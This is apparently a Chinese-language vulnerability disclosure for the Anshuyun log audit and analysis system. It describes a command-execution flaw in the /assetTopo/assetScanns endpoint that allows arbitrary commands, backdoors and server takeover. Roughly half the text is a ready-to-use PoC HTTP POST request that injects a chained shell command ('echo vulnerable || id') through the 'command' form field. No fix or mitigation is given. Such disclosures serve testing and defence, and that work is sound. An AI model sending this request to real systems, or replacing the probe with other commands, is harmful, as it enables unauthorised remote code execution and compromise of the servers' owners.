漏洞描述
安数云日志审计系统是安数云公司自主研发的专业日志安全审计产品。该系统可以实时监视网络中的各种操作行为和攻击信息,通过事件监控模块监控网络设备、主机系统等的日志信息,及时发现正在发生和已经发生的安全事件,并通过响应模块采取措施,确保网络和业务系统的安全。安数云综合日志分析系统的 /assetTopo/assetScanns 接口存在命令执行漏洞,攻击者可以利用该漏洞在服务器端执行任意命令,写入后门,获取服务器权限,进而控制整个web服务器。
安数云综合日志分析系统 /assetTopo/assetScanns 命令执行漏洞
PoC代码
POST /assetTopo/assetScanns HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 35
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0
command=echo%20vulnerable%20||%20id